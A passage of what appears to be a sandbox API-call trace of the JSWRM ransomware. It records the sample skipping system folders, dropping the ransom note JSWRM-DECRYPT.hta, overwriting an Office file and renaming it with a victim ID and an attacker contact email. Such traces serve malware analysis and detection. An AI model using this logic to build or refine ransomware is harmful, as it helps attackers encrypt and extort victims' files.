lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0071.842] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa92a53a0, ftCreationTime.dwHighDateTime=0x1d4dd07, ftLastAccessTime.dwLowDateTime=0x153972d0, ftLastAccessTime.dwHighDateTime=0x1d4ff75, ftLastWriteTime.dwLowDateTime=0x153972d0, ftLastWriteTime.dwHighDateTime=0x1d4ff75, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="moments.exe", cAlternateFileName="")) returned 1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2=".") returned 1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="..") returned 1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="...") returned 1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="windows") returned -1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="recovery") returned -1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="perflogs") returned -1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="documents and settings") returned 1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="$RECYCLE.BIN") returned 1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="system volume information") returned -1 [0071.842] lstrcmpiW (lpString1="moments.exe", lpString2="msocache") returned -1 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="moments.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="moments.exe", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="moments.exe", lpUsedDefaultChar=0x0) returned 11 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="moments.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="moments.exe", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="moments.exe", lpUsedDefaultChar=0x0) returned 11 [0071.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0071.843] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9e7b530, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa146f18e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda9a8629, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="Office16", cAlternateFileName="")) returned 1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2=".") returned 1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="..") returned 1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="...") returned 1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="windows") returned -1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="recovery") returned -1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="perflogs") returned -1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="documents and settings") returned 1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="$RECYCLE.BIN") returned 1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="system volume information") returned -1 [0071.843] lstrcmpiW (lpString1="Office16", lpString2="msocache") returned 1 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0071.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\office16\\jswrm-decrypt.hta")) returned 0xffffffff [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0071.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0071.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\office16\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0071.937] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.937] WriteFile (in: hFile=0x454, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0071.938] CloseHandle (hObject=0x454) returned 1 [0071.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0071.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0071.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0071.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0071.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0071.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0071.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0071.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0071.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0071.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\office16\\jswrm-decrypt.hta")) returned 0x20 [0071.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0071.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0071.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0071.940] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9e7b530, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa146f18e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2188e6e5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0071.940] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.940] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9e7b530, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa146f18e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2188e6e5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0071.940] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.941] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.941] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x217a9c2a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x217a9c2a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x218b49b8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0071.941] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0071.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0071.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0071.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0071.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0071.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.941] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x2a9c0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OSPP.HTM", cAlternateFileName="")) returned 1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2=".") returned 1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2="..") returned 1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2="...") returned 1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2="windows") returned -1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2="recovery") returned -1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2="perflogs") returned -1 [0071.941] lstrcmpiW (lpString1="OSPP.HTM", lpString2="documents and settings") returned 1 [0071.942] lstrcmpiW (lpString1="OSPP.HTM", lpString2="$RECYCLE.BIN") returned 1 [0071.942] lstrcmpiW (lpString1="OSPP.HTM", lpString2="system volume information") returned -1 [0071.942] lstrcmpiW (lpString1="OSPP.HTM", lpString2="msocache") returned 1 [0071.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0071.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.HTM", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.HTM", cchWideChar=8, lpMultiByteStr=0x345f2a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPP.HTM", lpUsedDefaultChar=0x0) returned 8 [0071.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0071.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.HTM", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.HTM", cchWideChar=8, lpMultiByteStr=0x345f278, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPP.HTM", lpUsedDefaultChar=0x0) returned 8 [0071.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0071.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0071.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0071.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.942] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=174528) returned 1 [0071.942] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0071.943] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0071.955] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.956] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0071.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0071.956] CloseHandle (hObject=0x458) returned 1 [0071.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0071.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0071.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0071.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0071.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0071.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0071.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.957] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0071.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0071.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0071.957] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ea17a8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x17103, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OSPP.VBS", cAlternateFileName="")) returned 1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2=".") returned 1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="..") returned 1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="...") returned 1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="windows") returned -1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="recovery") returned -1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="perflogs") returned -1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="documents and settings") returned 1 [0071.957] lstrcmpiW (lpString1="OSPP.VBS", lpString2="$RECYCLE.BIN") returned 1 [0071.958] lstrcmpiW (lpString1="OSPP.VBS", lpString2="system volume information") returned -1 [0071.958] lstrcmpiW (lpString1="OSPP.VBS", lpString2="msocache") returned 1 [0071.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0071.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.VBS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.VBS", cchWideChar=8, lpMultiByteStr=0x345f2a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPP.VBS", lpUsedDefaultChar=0x0) returned 8 [0071.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0071.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0071.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.VBS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 